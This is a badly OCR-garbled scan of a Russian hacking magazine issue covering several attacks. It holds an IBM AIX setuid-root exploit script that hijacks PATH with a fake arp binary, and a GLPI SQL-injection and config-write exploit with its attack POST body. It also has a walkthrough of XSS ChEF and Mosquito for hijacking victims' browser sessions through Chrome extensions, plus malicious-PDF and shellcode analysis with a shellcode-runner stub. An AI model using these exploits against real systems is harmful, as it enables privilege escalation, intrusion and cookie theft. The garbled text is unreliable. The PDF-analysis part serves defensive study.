Д ^ I I I I • 1 I I 

і ^ і І ! ? ! ? ^ і * 

■-!_??????? 4-4-4- 

1 ■ ■ I I і I I I І ■ 1 г 



7—п. — — — -1-4-п-о- гъ. о. о. “ • 777 7 77 ? -ь-м-+- 

I 1 1 1 ^1 ^ • ■ № I I I I I I 1 1 1 1 

7 =-=.)-+-) :-м-=- : - -і- ? ? 

?«--=-н-+.-+=-===--:+774-н-н-і-Н” 

? , ; ? -Ц--1-4— і--і-+.-і-ч— 1_ 

77+-==: : ^+ 77 ++++++++++ 

7 ! ! : — — =— — — — — : : , с 7 — е - ! — р+ , 4 - 4"і — и- 

? ! і — ■ "■ "■ і і і I < ■ ■ I і і- 

?+:==-:„ . : — . . 4- ? ? ++^-м-++-н-і- 
. . .==+=== — =-, . . .=?+++++++++ 



-Н-М-Н-Н- 



-Н-+-Н--Н- 



+++++ 



++= 



=+: 



[-І-] Ассв 55 дгапЕесІ, Ооп'І: Ье еѵіі... 

# I 



Пример работы эксплойта для уязвимости в ІВМ АІХ 



ІВ ІМТЕКРАСЕ АКР ТАВІЕ 



/боте/изег/іЬзіаб/сІиттуЬіп/агр 

.-б 

ІЬ 

иіс!=208(и5ег) й іб =1( 5іаТ-р) еиіс1=0(гооТ) 

Вот мы с тобой и получили, что хотели, — долгожданный зиісі-бит. Причем 
заметь — без использования утилиты обібитр и проверки каждого байта би- 
нарника или реверсинга в дизассемблере. 

ЕХРІ.ОІТ 

А теперь рассмотрим, как все это можно эксплуатировать. В качестве экс- 
плойта у нас будет Ьазб-скрипт, а уязвимую команду возьмем отличную 
от той, что мы рассмотрели. 

Для начала выбирается директорию для записи и в ней создается шелл 
с фальшивым АПР: 

ТМР0ІК=/1:тр 

ТАІМТ=${ТМРОІК}/агр 

Р5НЕІ_і_=${ТМРОІК}/г001:-5іі 

Далее занесем в наш атакующий АНР полезную нагрузку: 




Г 
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саб > ${ТАІІ\ІТ} <<-! 

#!УЫп/зІі 

ср /Ьіп/зЬ ${К5НЕІ_1} 
сЬомі гооб ${К5НЕ11} 
сЬтосІ 4555 ${К5НЕІ_І_} 

і 

і 



Как видишь, нагрузка должна будет скопировать обычный шелл из системы 
и выставить ему права, чтобы можно было пользоваться всем. 

Далее выставляются права на выполнение и общий доступ для АВР: 



1 

} еізе { 



змібсЬ ($ Р0 5 Т [ "іп збаІГ'Ѵ) { 

Сама по себе эта часть кода очень проблемная, так как позволяет выбрать 
любой шаг установки, даже если она уже была завершена. 

Например, мы можем вызвать этап Ебаре_4, в котором содержится 
функция збер7, а она, в свою очередь, подвержена 501_-инъекции из НТТР- 
заголовков: 



сЬтос! 755 $0АІМТ} 

И наконец, последний этап: 

ссі ${ТМР0ІК} 

РАТН= . :${РАТН> 
ехрогб РАТН 

/изг/Ьіп/іЬзбаб -а -і еп0 2>/сІеѵ/пи11 >/сІеѵ/пи11 

Проходим в директорию, где лежит наш файл АВР, добавляем текущую 
в переменную РАТН и запускаем уязвимую команду с каким-либо сетевым 
интерфейсом. 

Исходник эксплойта можно скачать из базы ехрІоіі-бЬ ( ЫіІу/ІѲІг ), 
а пример работы можно увидеть на скриншоте. 

ТАНСЕТ5 

* ІВМ АІХ <= 6.1 ; 

* ІВМ АІХ <=7.1; 

* ѴІ08 2.2.2.2-РР-26 5Р-02. 

бОШТІОЫ 

Есть исправление от производителя. 

ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНЫХ 
КОМАНД В СШ 

СѴ55ѵ2: ІМ/А 

Дата релиза: 12 сентября 2013 года 
Автор: Тгізіап беііег 
СѴЕ: 2013-5696 

СІ-РІ (Сезііоппаіге ІіЬге сіе рагс іпТогтаІідие, свободный менеджер ИТ- 
инфраструктуры) представляет собой систему работы с заявками и инци- 
дентами, а также средство для инвентаризации компьютерного оборудо- 
вания (компьютеры, программное обеспечение, принтеры и прочее). Сам 
менеджер является веб-приложением с открытым исходным кодом и напи- 
сан на РНР. 

501_-инъекция была обнаружена в файле іпзбаіі/іпзбаіі.ріір. Этот 
файл может быть выполнен, даже если установка уже была закончена. После 
выбора языка он проверяет лишь наличие переменной $ _Р05Т [ 1 іпзбаіі ' ] : 



•Ршісбіоп 5 1: е р 7 ( ) { 

еІоЬ а! $1_А1\1С., $СРС_66РІ; 

ге диіге_опсе (6І_РІ_К00Т . "/іпс/сІЬтуздІ.сІазз . рЬр" ) ; 

гедиіге_опсе (биРІ_С<ЖРІС_0ІК . 'Усоп^аЬ.рНр" ); 

$РВ = пем 0В(); 

$диегу = "ІІРОАТЕ §1рі_соп6§з 

5ЕТ иг1_Ьа5е = ' " . 5бг_гер1асе("/іп5ба11/іпзба11.рІір", «-« 

, $_5ЕГСѴЕР[ ’ НТТР_ВЕРЕКЕВ _ 
иНЕКЕ ісі = ' 1 ' " ; 

ІРВ^диегу ($диегу) ; 

Найденную инъекцию через переменную $_5ЕКѴЕК[ ' НТТР_КЕРЕВЕК' ] мы 
можем использовать для получения ошибки или проведения атаки через 
«слепую» 301-инъекцию. 

Но больший интерес представляет функция ирсіабеі (этап ирсІабе_1), так 
как позволяет задавать параметры соединения с базой данных в функции 
сгеабе сопп Е1е. 



Г ипссіоп сгеабе сопп бІеГЗЬозб. $изег., $раззмогсІ., $0Впате) { 
еІоЬа! З СР66І.РІ ; 

$0В_збр = "<!--?р!ір\п сіазз РВ ехбепсіз РВтѵздІ { 

\п уаг_\$сІЫпо5І: = $.Ьозб ; 

\п ѵ аг \$сІЬизег = $изе г . " 1 ; 

\п ѵаг \$сІЬра5 5ыогсІ= . гаыиг1епсосІе($ра55ыогсІ) 

\п ѵаг \$с!ЬсІе-Раи1б = ' " . $0Впате . 

\п } \п 

&-р р - бо реп(6І.РІ С0ІМРІ6 РІК . 'Усо пЛ^ сІЬ.рЬ р" . 1 іигЬ 1 1 ; 

і± ($*р) { 

$бм = бмг;1бе($-Рр.,$ВВ_5бг); 

-РсІ05е($-Рр) і 
геѣигп 1:гие; 

} 

геѣигп -Раізеі 

} 

Типсбіоп ирсІабеіУІЬозб . $изег, $раззѵюгсУ $РВпате) { 

§1оЬа1 .$^N6; 

і± (сгеабе_сопп_-Я1е($Ііо5І: , $изег, $ра55ілюгсІ_, $ОВпате) *-> 

&& ! етріу 



Сами параметры задаются через РОЗТ-запрос: 



і± ( ! і 5 5 еб ( $_Р05Т "іпзбаі і" (П { 

$_5Е55І0М = аггауП : 

і-р (61е_ехі5І:5(61РІ_С0МРІС_0ІК. "/сопб ^сІ Ь .рІір")) { 
Нбші : : гес)ігесб(СІРІ_ВООТУУ ілсІех, рИр ") ; 

сіе(); 

} еізе { 

ИеасІег_ІтІ:т1_("5е1ес'Р уоуг 1ап§иа§е"); 

сМоо5е_1апёиа^е( ) ; 



^0 Ф** 



пена 



СЬРІ представляет 
работы с заявками и ищи 
а также средство для инвентари- 
зации компьютерного оборудования 
(компьютеры, программное обеспе- 
чение, принтеры и прочее) 



сазе "и рбабе 1" : 

іі (етрбу($ _Р05Т І, сІа1:аЬа5епате 11 ( ) ) { 

а_Р05Т["с^а^:аЬа5епате ,, ] = 

} 

и рсі а бе 1_( $_РОБТ сі Ь Уэо зб"] , $_Р 05Т [ " сі Ь изе г ” ] , «-■ 
$_Р05Т[ "сІЬ^разз" ] л $_Р05Т[ "сІабаЬазепате" ] ) ; 

Ьгеак: 



При создании исправления (оі1.І ѵ/18зУМкН ) разработчики пошли тем же 
путем, что и многие другие программисты, столкнувшиеся с подобной ошиб- 
кой. Если обнаруживается уязвимый файл, то пользователю постоянно выво- 
дится сообщение, что надо удалить этот файл. 



ЕХРІ.ОІТ 

В итоге получается примерно следующий атакующий РОЗТ-запрос, кото- 
рый отправляется простым сценарием на РуШоп: 



Ьосіу = ’ іпзба11=ирсІабе_1 ' 
Ьосіу += '&сІЬ_Ііо5б=1оса1Ио5б 1 
Ьосіу += ' &сІЬ_изег=гооб ' 
Ьосіу += ’ &бЬ_разз=пооб 1 
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Расширения для 



вектор атаки юзеров 



Многие из нас используют Ѳоодіе 
СГіготе. Он действительно шустр, 
быстро патчит разные баги, имеет 
Ьид Ьоипіу и ѴѴАР. Да собственно, что 
рассказывать о нем, все сами знают 
его плюсы и минусы. 



Хрому, как и любому современному браузеру, можно добавить 
новых возможностей через плагины (НазІпДіаѵа/еІс) и расшире- 
ния. Последние пишутся на НТМІ_5 и встраиваются прямо в бра- 
узер, где взаимодействуют с контентом пользователя (раз мы 
заговорили о НТМІ_5, то речь в статье пойдет в основном об Х55). 
Вот здесь и начинаются узкие места. Безопасность расширений 
для хрома рассматривал Тарас Иващенко { ЬіІ.Іѵ/осМ сІтП . Эту же 
тему поднял Кшиштоф Котович (КггузгіоТ Коіоѵѵісг), и его иссле- 
дованиям мы и уделим сегодня наше внимание. 

Итак, чуть подробней, что такое вообще расширение 
для хрома. Это НТМІ + 35 + С55, запакованный в .іір, под- 
писанный девелоперским ключом и названный . сгх (содержа- 
щий еще некоторые служебные файлы). Расширения при уста- 
новке запрашивают разные права, например доступ к данным 
ко всем сайтам. Но стоп, как они это делают? Ведь есть же 5ате 
Огі§іп Роіісу для контроля доступа к данным на разных сай- 
тах. Но расширения работают через специальное АРІ, которое 
позволяет: 

• изменять настройки прокси; 

• читать/менять куки; 

• просматривать историю; 

• взаимодействовать с открытыми табами и их контентом; 

• получать доступ к закладкам и многое другое. 




Сергей Белов 




Как видишь, список впечатляет. Но, конечно, все зависит 
от прав расширения при установке. 

Итак, где же проблема? Не все разработчики (как обычно) 
пишут код по инструкциям. И в нашем случае появляется ситу- 
ация, когда разработчик берет значения с открываемой стра- 
ницы и куда-то их подставляет. Например — вызывает какую-то 
дополнительную тулзу через АРІ браузера с нужными параме- 
трами. Так была найдена возможность выполнить произволь- 
ный код на стороне клиента в расширении Сг-§р§ ѵ 0.7.4 
(реализует ОРО в ОтаіІ). Но мы в статье разберем ситуацию, 
когда можно провести ХЗЗ-атаку на пользователя, используя 
уязвимость в расширении. Например, так же берется контент 
и подставляется в чистом виде в другое место. Нужно понимать, 
что это происходит в контексте расширения, а соответственно, 
со всеми его правами (доступ к вкладкам, другим сайтам и тому 
подобное). Для этого есть две популярные тулзы от все того же 
автора: Моздиііо и Х55 СНЕР, 



Х35СНЕР 

Х35 СНЕГ (МН р5://дШиі 



и П 



ІИ 



) позволяет эксплуа- 



тировать найденные Х53 в расширениях. Возможности: 

• смотреть открытые табы у жертвы; 

• выполнять любой из- код в открытых табах (СІоЬаІ 35); 




ХАКЕР 11/178/2013 



Атакуем через раширения хрома 



77 



Орегаііпд $у$(ет 



Шоте Вгоѵѵзег 



ч » ■ “ ■» 



ѴѴеЬ Раде 
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• вытаскивать НТМІ_, читать/менять куки (включая НТТРОпІу), 
1оса15-1;ога§е; 

• вытаскивать историю браузера и взаимодействовать с ней; 

• оставаться активным до закрытия браузера (или еще доль- 
ше, если есть доступ к 1оса1$1:ога§е); 

• делать скрины окна; 

• расширять атаку через ВеЕР; 

• просматривать файловую систему через біе : //; 

• обходить песочницу расширений хрома и напрямую взаи- 
модействовать с контентом. 

СНЕР — это обычное веб-приложение. Можно использовать 
версию и на РНР, и на ЫоРе.]5 (работа идет через веб-сокеты). 

Итак, для начала надо найти ХЗЗ в расширении (или исполь- 
зовать демку, которая есть в репо). Обнаружить ХЗЗ можно, 
просто просматривая сайт или взаимодействуя с сайтом, где 
ты уже заранее расставил кучу ХЗЗ-векторов. Конечно, более 
интересны способы с анализом ^-кода расширения. 
Требования к жертве: 

• доступ к табам ; 

• доступ ко всем урлам (<а11_игІ5> или ЬТѢр ://*/*); 

• страница в фоне для постоянного коннекта (можно и без нее, 
но это ограничит функционал тулзы); 

• отсутствие ограничений СЭР (сопІепІБесигіІуРоІісу). По- 
дойдут расширения с манифестом ѵі .0 в хроме 18 и выше. 



Как только найдено место, куда можно подставить Х55- 
вектор, — можно генерировать хук в консоли приложения (в 
зависимости от запущенного варианта. Например, для вариан- 
та с нодой это: И1:1:р://127.0.0. 1:8080/}. И как только ты его 
подставишь и уже с клиента сработает ХЗЗ с хуком — в админ- 
панели можно будет увидеть новую сессию (а-ля метасплоит). 
Далее все очевидно. Интерфейс радует (сверстано на Тѵѵійег 
Вооізігар), все довольно нативно и не нуждается в объяснении. 

Вообще, многие требования к жертве довольно сложно вы- 
полнимы в текущих условиях (прошел год с момента показа тул- 
зы), манифест 1 ,0 будет дропнут из хрома с 2014 года, но это 
не уменьшает академической ценности. 



МОЗОШТО 

МоздиІІо ( Р1ІР5;//аі1биЬ.сот/ко1о/тозаиі1о ) — утилита, напи- 
санная на РуІРоп, позволяющая превратить браузер жертвы 
в прокси-сервер с ее куками! 

Ситуация такая же, как и с ХЗЗ СИ ЕР. Для начала необходима 
ХЗЗ в расширении (лично я нашел в Апу.ОО), Теперь, если у есть 
доступ к данным на всех сайтах, можно через расширение от- 
правлять запросы на другие сайты, используя куки жертвы! 

Утилита написана на Рубіоп, но изначально была разрабо- 
тана под Мае ОЗ. Казалось бы, РуІИоп кросс-платформенный, 
однако, возникли проблемы с работой на других ОС (в итоге 
я завел его и под вин, и под линуксом). Сейчас после переписки 
с Кшиштофом многие баги исправлены, если что — пиши или 
автору тулзы, или мне, разберемся :). 



Гч 

Схема взаимодействия 
расширения, браузера 
и контента 



Интерфейс Х35 СПЕР 
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Как эта штука работает? Расширения хрома могут слать 
ХНВ-запросы без ограничений, в этом вся основная идея тул- 
зы, тут и рассказать-то больше нечего. Так же как и в случае 
с ХЗЗ С И ЕР, встраивается хук в страницу, и, так как уже и 5 вы- 
полняется в контексте расширения, можно слать и получать 
ответы, перенаправляя их себе. Круто, не правда ли? При этом 
в Мозциііо встроены всякие нужные штуки, типа ззізігір, моду- 
лей іл/еЬзоскеіз и других вещей. Установка: 

§11 сіоре ИИ рз: / /^іббиЬ.с от/ко бо/тоздиібо.^іІ: 
ссі тозд иіііо 

§11: зиЬтосІиІе ирсіаіе - -іпі 1 --гесигзіѵе 
еазу іпзба іі руорепззі 
еазуіпзбаіі руазпі 
еазу_іп5І:а11 Пазк 

Далее запускаем его 

руЫіоп то5диі1:о/5І:агі:. ру 8082 4444 --Мзбр 8000 

Прокси будет запущен по адресу 127 ,0.0. 1:4444 (это для нас), 
через порт 8082 будет происходить обмен данными с жерт- 
вой, и на порту 8000 будет генерилка хуков (/делегате. 
для атаки. 

Теперь я настоятельно рекомендую сначала запустить Вигр, 
выставить в нем ирзігеат ргоху — наш тозциНо- прокси, это 
нам поможет с совместимостью работы с проксей и избавит 
от многих глюков. 

Далее идем по адресу И1:1:р://1оса1Ііо5І::8000/§епега1:е. 
МТтІ, выставляем (если надо) значения Ьазе\_иг1 (откуда под- 
тягивать хук) и м5\_рог1: (сервер обмен данными с жертвой) 
и жмем Сепегаіе Роок. Эту-то строчку нам и надо выполнить 
в расширении. 

Если все прошло успешно, то мы увидим в консоли Мозциііо 
строчку "МоздиіТо сПепТ соппесТеб: это означает, 

что наш хук дернулся жертвой в расширении и мы можем вы- 
ходить через нее в интернет с ее куками :). То есть если жертва 
была залогинена в ОтаіІ или еще куда — мы также можем по- 
пасть на эти страницы, так как запросы от нас будут с тем же !Р, 
юзер-агентом и куками :). 

оытво 

Надеюсь, эта статья принесла тебе новые знания, а также до- 
бавила паранойи относительно расширений и их запросов. 
Будь внимателен :). ІНІ 






мер жертвы 






7<* 



Взлом 
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Ищем эксплойты в документах своими силами 



Стоит засветить свой почтовый адрес в Сети, как сразу ты становишься просто потрясающе 
удачливым человеком. Почти каждый день начинают приходить письма о том, что ты пре- 
тендуешь на какое-то огромное наследство или выиграл в лотерею. Добрые люди присылают 
РРР’ки со сверхсекретными данными, и очень часто даже антивирусы на них не ругаются. По- 
этому, чтобы окончательно решить, стоит ли открывать очередной «секретный отчет по Си- 
рии», придется провести собственное расследование. 



МНОГООБЕЩАЮЩИЙ АТТАЧ 

Как-то раз, приводя в порядок почтовый ящик и удаляя неже- 
лательную корреспонденцию, я наткнулся на несколько писем 
с вложением, якобы от британского подразделения Ооодіе 
(правда, отправленных почему-то с китайских серверов), с оче- 
редным заманчивым предложением. Собственно, внимание 
привлекли не сами письма, а то, что они были с вложением 
в виде РЭР-файла. «Вот китайские друзья! Вот молодцы! При- 
слали мне 0-сІау», — подумал я. И сразу же полез проверить 
файл на ѴігизТоіаІ — вдруг это какое-то старье. Подумав, сер- 
вис ответил, что файл абсолютно нормальный, — ни один анти- 
вирус не имел к нему никаких вопросов. «Что-то здесь не так. 
Не могли же мои китайские друзья так меня подвести?» Разве- 
ять сомнения можно было только одним способом — взять и ис- 
следовать файл самому. Результатом и полученными знаниями 
я и хотел бы с тобой поделиться. 

РОР-ФОРМАТ 

Прежде чем начать, давай кратко рассмотрим формат РОР- 
документов. РРР-файлы состоят в основном из объектов, ко- 
торые бывают восьми типов: Ьооіеап-значения; числа; строки; 
имена (Маплез); массивы (упорядоченный набор объектов); 
словари (Оісбопагіез) — коллекция элементов, индексируемых 
по имени; потоки (Зігеатз) — обычно содержащие большой 
объем данных; ІЧиІІ -объекты. 

Каждый РРР-документ должен начинаться с заголовка, ко- 
торый идентифицирует его как РРР-файл и включает в себя 
номер версии: %РРР-1.5. Заканчиваться файл также должен 
определенным образом — сигнатурой %%ЕОР. 




Антон «ап4» Жуков 

апШгеаІ.хакер.ш 
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После заголовка идут объекты. Каждый объект начинается 
с номера ссылки, номера версии и ключевого слова оЬ і . За ним 
располагается контейнер объекта, заключенный между симво- 
лами << и >>. Заканчивается объект ключевым словом епРоЬ;). 
Чтобы было понятней, приведу пример: 

1 0 оЬ] 

<< 

/Туре /Са^аіоё 
/ОиТІіпез 2 0 К 
/Ра§ез 3 0 К 

>> 

епбоЬд 

Данный объект начинается с номера ссылки — 1, номера 
версии - 0 и ключевого слова об]. Затем идет контейнер объ- 
екта (между символами << и >>). Заканчивается все ключевым 
словом епРоЬ^, Контейнер может состоять из различных объ- 
ектов. Наиболее широко распространенным является сло- 
варь (бісііопагу), представляющий собой последовательность 
пар «ключ — значение», заключенных в скобки << и >>. Объект 
бісііопагу — это ассоциативная таблица, содержащая пары 
объектов, известных как записи. В приведенном выше примере 
/Туре — это ключ, а /Саѣа1о§ — значение. 

Любой объект в РйР-файле может быть отмечен как кос- 
венный (іпбігесі). Это дает ему уникальный идентификатор, 
с помощью которого остальные объекты могут ссылаться 
на него. Например, ключ /ОЩІіпез указывает на косвенный 
объект 2 0. 
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Разбираем РОГ 
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РРР ЗТаП (ѵегзіоп) 
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Еще один важный объект, входящий в состав РЭР-файла, — 
это поток (Зігеат), который, как и Зігіпд, представляет собой 
последовательность байт. Зігеат включает в себя Эісііопагу, 
за которым следуют данные, заключенные между ключевыми 
словами зігеат и епсізіігеат, Поток, в отличие от строки, может 
иметь неограниченную длину. Одна из опциональных записей, 
которая может быть в Оісііопагу потока, — РіІІег. РІІІег — это зна- 
чение, которое указывает, надо ли распаковывать или расшиф- 
ровывать данные потока. В РОР-файлах используется множе- 
ство алгоритмов сжатия и шифрования, таких как: РІаІеРесобе 
(основанный на ОЕРЬАТЕ или 2ІР-алгоритме), ОСТОесосІѳ 
(фильтр, основанный на и РЕС -стандарте) и другие. 

иаѵаЗсгірІ — еще один из часто встречающихся объектов 
в РРР-файле. Движок ^ѵаЗсгірІ от АсІоЬе частенько страдает 
от различных уязвимостей, поэтому все, что надо злоумыш- 
леннику для успешной эксплуатации, — это создать специаль- 
ный скрипт, который бы использовал очередную уязвимость 
в движке. Объект ^ѵаЗсгірІ обычно выглядит следующим 
образом: /ЭаѵаБсгірІ: /35 ]’аѵа_5сгірІ:_сосІе. Переменная 

]аѵа_5сгірі:_сосІе может представлять сам код или быть кос- 
венным объектом,, ссылающимся на другой ^ѵа5сгірІ-код. 

НАИБОЛЕЕ ИНТЕРЕСНЫЕ «ПОЛЯ » 

Как мы выяснили, РЭР-файл состоит из заголовка, объектов, 
таблицы перекрестных ссылок (для определения местоположе- 
ния объектов) и трейлера. С точки зрения охоты за эксплойтами 
самыми интересными для нас строками будут: 

• /ОрепАсіііоп и /АА (Асісііііопаі Асііоп) определяют скрипт или 
действие, запускаемое автоматически; 

• /Матез, /АсгоРогт, /Асбіоп также могут устанавливать и за- 
пускать скрипты или действия ; 

• /ЗаѵаБсгірі: задает и аѵаЗсгірІ- код для выполнения; 

• /СоТо* меняет отображение на указанное место внутри ис- 
ходного или другого РОР-файла; 

• /І_аипсб запускает программу или открывает документ; 

• /ІШ обращается к ресурсу по его ЭВ!.; 

• /БиЬтіііРогт и /СоТоК могут отправлять данные на заданный 

они 

• /ГСісІіМесІіа используется для встраивания РІазГі в РОР; 

• /ОЬз51:т может прятать объекты внутри Зігеат’ а. 

Однако при их поиске не стоит забывать, что они могут быть 
обфусцированы с помощью Гіех-кодов. В этом случае, напри- 
мер, /ИаѵаБсгірІ: может превратиться в /3#61ѵа5сгір1:. Вооб- 
ще, существует несколько трюков, к которым пребегают, чтобы 
усложнить жизнь антивирусам и исследоватеям. В нормальном 
виде каждая строка должна располагаться внутри круглых ско- 
бок: /ІШ (Ітб-іір : //хакер. пи). Однако строку можно разбить 
на несколько, добавив бэкслеш после каждой строки: 

/ІШ (Ь\ 

ѣѣр : //хакер . ги 



Естественно, количество переносов неограниченно, 
так что ничто не мешает записать строку в «столбик». По- 
мимо этого, можно воспользоваться восьмеричным пред- 
ставлением символов и получить результат вида: /ІШ 
(ХІБѲИр: //хакер . ги). Или, если перевести все символы: /ІШ 
(\150\164\164\160\163.... ). Строки также можно представить 
в шестнадцатеричном виде /ІШ <687474703а2-Р2-?7861бЬб57 
02е7275>. В них шестнадцатеричные числа можно разделять 
пробелами (<68 74 74 70...>), причем количество этих пробелов 
неограниченно. Еще один хитрый способ модификации строк — 
это шифрование. Тебе когда-нибудь встречался РЭР-документ, 
из которого нельзя было скопировать текст или который нельзя 
было распечатать? Если так, то это как раз и был тот самый за- 
шифрованный документ. В таком документе зашифровываются 
все строки и потоки, а сами объекты остаются незашифрован- 
ными. Эти моменты тоже придется учитывать при ручном ана- 
лизе РЭР-файлов, потому что такие приемы часто применяются 
для создания полиморфных форм одного зараженного РОР. 

НЕПРОСТАЯ ЗАДАЧА 

Обычно злоумышленники стараются как можно лучше замаски- 
ровать наличие в РОР-файле какого-либо злонамеренного кон- 
тента. Для этого они прибегают к обфускации иаѵаЗсгірІ-кода, 
манипуляциям над строками и прочим приемам, усложняющим 
анализ как антивирусным решениям, так и исследователям. 
Сегодня перед нами стоит задача, несмотря на все хитрые при- 
емы злоумышленников, научиться находить вредоносные части 
РЭР-файлов и определять, какой функционал скрывает в себе 
внедренный шелл-код. 

В принципе, про анализ любого вредоносного РОР-файла 
можно написать целую статью, так как каждый экземпляр ис- 
пользует свой шелл- код, свои методы для сокрытия вредо- 
носной части и прочие трюки. Поэтому мы рассмотрим лишь 
основные методы сокрытия и техники поиска, которые приме- 
нимы ко всем РОР-файлам. А в каждом конкретном случае при- 
дется думать головой и искать методы решения. Начнем с рас- 
смотрения самой простой ситуации и постепенно перейдем 
к более сложным. 

ОБЫЧНЫЙ ІАѴА8СВІРТ 

Самый простой вариант — это когда над файлом не проводи- 
ли никаких манипуляций для сокрытия его вредоносного фун- 
кционала. Представим, что у нас на руках такой файл и нам надо 
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^ѵаЗсгірі: указывает 
на косвенный объект 
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Весь приведенный 
в статье софт ждет тебя 
на диске. 
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Пример зашифрованной строки 
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оценить, нормальный он или зараженный. Первым шагом не- 
обходимо скормить его антивирусу. Если он молчит и говорит, 
что все ОК, можно обратиться к сервису Ѵі г изТокаІ, чтобы про- 
гнать файл сразу на нескольких антивирусах. Правда, в случае 
если используется какая-нибудь О-сІау-уязвимость, это, скорей 
всего, не поможет. Поэтому придется проверить все самому. 
Начнем с того, что выясним, какие интересные объекты вхо- 
дят в состав нашего файла. Прежде всего нас будет интере- 
совать ЗаѵаЗсгірі, так как в большинстве зараженных РОГ ис- 
пользуются уязвимости именно в движке 05. Выявить наличие 
ОаѵаЗсгірІжода в документе можно несколькими способами: 
либо открыть файл в любом текстовом редакторе и выполнить 
поиск по /Заѵа5сгірі: или /1)5, либо воспользоваться скриптом 
рсІТісІ.ру — рсЖсІ.ру І.рсІ-Р, который отобразит все входящие 
в файл объекты. 

Если в документе присутствует 33, то велика вероятность 
того, что он содержит вредоносный код. Поэтому дальше надо 
анализировать его, Так как мы начали с самого простого случая, 
то никаких дополнительных техник сокрытия не используется 
и вытащить 35-код из РйР’ки можно с помощью рсІІ-рагзег.ру: 

рсІР-рагзе г .ру --о ЬіесІ: б --біііег --гам І.рсІТ > 1.І5 

или с помощью РОР Зігеапп Оитрег. После чего сохранить в от- 
дельный файл для последующего анализа. Следующим нашим 
шагом будет изучение кода скрипта и выделение из него шелл- 
кода для дальнейшего анализа. 

ИССЛЕДОВАНИЕ ШЕЛЛ -КОДА 

Шелл-код в ЗаѵаЗсгІрІ обычно формируется при помощи функ- 
ции ипезсаре, в которую передается строка в юникоде. Для того 
чтобы шелл -код можно было проанализировать, необходимо 
восстановить обычный порядок байт для каждого символа. Это 
можно сделать либо с помощью вспомогательных утилит (на- 
пример, МаІгіІІа), либо прямо в консоли Ыпих: 

саі: рсі-р-ехр.іхі: [ регі -ре ' з /\%и( ..)(. .)/«-■ 

сМг(|іех($2) ) . сЬг.(.Мех($1) )/§е 1 > зІіеІІсосіе.Ьіп 

где рсІ-Р-ехр.'Схі — файл с исходным шелл-кодом, зНеПсоЗе. 
Ьіп — файл, в который будет записан преобразованный шелл- 
код. После этого можно приступить к его исследованию. 
Для этого можно воспользоваться тулзой зсіезі, входящей в би- 
блиотеку ІіЬети: 
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Онлайн-ресурсы для 
автоматической про- 
верки РОР-файлов: 



РРРЕхатіпегГоіІ. 
Іѵ/1 7псТр6 ). ^ипраск 
р зипраск. і еек.огд ), 
ѴѴераѵѵеі { щрт іі 
ізесІаЬ.ога ). СаІІиз (Ыі 
Іѵ/1 9ѵѴдр7 ) 



Ьегпр йігескогу иііі Ье : С: ЧВОСиМЕ' ѵ ІЧиеег\0Ш16' ч 1 
ЬоайеЛ 1(13 Ъуіез Ігоп Р ііе запріе.зс 
Іпііііігаііоп Сопріеіе-. 

Мах Бігерг: 2000000 

ІІзіпд Ъазе 0x401000 

401ШЫ ЬоасІЬіЬгагуА Сміпіпеі; > 

4О10с4 I пСеітеЪОрепА Сиіп іпеі > 

4Ш10еЗ I пЪегпеіСоппееЪЙСзегиеі!': іліы.хакер.ги, рогк: 80, > 



БсЬезІ: -5$ 1000000000 < 5Іпе11сосІе.Ьіп 

После чего мы получим список всех АРІ-вызовов, выполня- 
емых из шелл-кода. Есть у зскезі еще одна интересная возмож- 
ность, о которой хотелось бы упомянуть, — с ее помощью ис- 
следуемый код можно представить в виде графа вызовов: 

зсЕез! -55 1000Ѳ00Ѳ00 -6 зИеІІсосІе егаріі.гііоѣ < «-■ 

зНеІІ сос І е. Ьіп 

боі: -Т р п§ -о зРіе11сосІе_§;гар.Ь.. рп§ 

5Іі е11со Зе_§ гар Р . сіоі: 

Иногда встречаются ситуации, когда для исследования при- 
ходится пользоваться обычным отладчиком. Перед этим надо 
написать небольшую вспомогательную программку, которая бы 
передавала управление на шелл-код: 

#іпс1ис(е <МІПСІ01л/5.11> 

сНаг со сі е П = ІІ скопирбвать шелл-код сюда": 

іпі: таіп(і п1 аг^ с. сНаг **аг%ѵ1 

і 

ВЫОКР оісі; 

Ѵігі;иаІРгоі:есіХ&с ос І е л 

РАСЕ_ЕХЕСІЛЕ_КЕАОЫГСІТЕ ^ &ОІСІ); 
іпі: (*-Еипс)(); 

-Рипс = (іпі: (*)()) сосіе; 

(ІПІ) (*-Рипс) ( ) ; 

} 



После чего скомпилировать и запустить под отладчиком 
для дальнейшего анализа. 

СЖАТЫЕ ПОТОКИ 

В рассмотренном выше случае все было предельно упрощено, 
увы, в реальной жизни такие сценарии практически не встреча- 
ются. Поэтому давай рассмотрим наиболее популярные при- 
емы, которые используются для сокрытия вредоносного кода. 

Если ты обратил внимание, когда мы говорили про структуру 
РОР-документа, мы сказали, что у объекта Зігеат может быть 
атрибут /Ріііег, который определяет, каким методом сжаты 
данные потока. Причем к потоку могут быть применены сразу 
несколько фильтров (например, /Ріііег [/Р1 /АНх]). Что каса- 
ется интересующего нас объекта ЗаѵаЗсгірІ, то он, в свою оче- 
редь, должен содержать либо функцию, либо косвенную ссылку 
на код для выполнения. Поэтому зараженные файлы очень ча- 
сто содержат ЗаѵаЗ с гірі- объекты следующего вида: /35 ( "Ыі і 5 . 
20рЕА5РІ.гРууіл(\(\)). При этом простой поиск функции по име- 
ни ничего не даст, так как она, скорее всего, будет расположена 
в сжатом потоке. Чтобы получить распакованное содержимое 
потока, можно воспользоваться утилитой РйРШ: 

рсІ-Рі: к І.рсІ-Р оиіриі: ипсотргеззесі. рсІ-Р ипсотргезз' 



БЪерсоипІ; 2000001 



Исследование шелл- кода при помощи зсіезк 



После этого у нас появится файл ипсотргеззесі. рбі с распа- 
кованным содержимым, пригодным для дальнейшего анализа. 
Ну а дальше действуем по использованной выше схеме. 
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О БФУСЦИ РОВАН н ы й идѵАзеш РТ 

К сожалению, так быстро проанализировать ОауаЗспрІ-код и выдернуть из него шелл-код, 
как мы рассматривали до этого, в реальной ситуации не получится. Практически всегда, 
чтобы запутать антивирусы и усложнить ручное исследование, ОаѵаЗсгірІ-код обфусцируют. 
В этом случае определить, что он делает, и выделить в нем шелл- код становится уже не такой 
простой задачей. Деобфусцировать код можно несколькими способами. Можно, например, 
выполнить его в браузере и вывести через аІегі() преобразованный код. Или воспользовать- 
ся программкой ЗрісІегМопкеу, а точнее, ее модифицированной версией, которую можно 
взять тут: Ьі1.1 у/4пхкУ\ . В отличие от оригинальной версии, которая только интерпретирует 
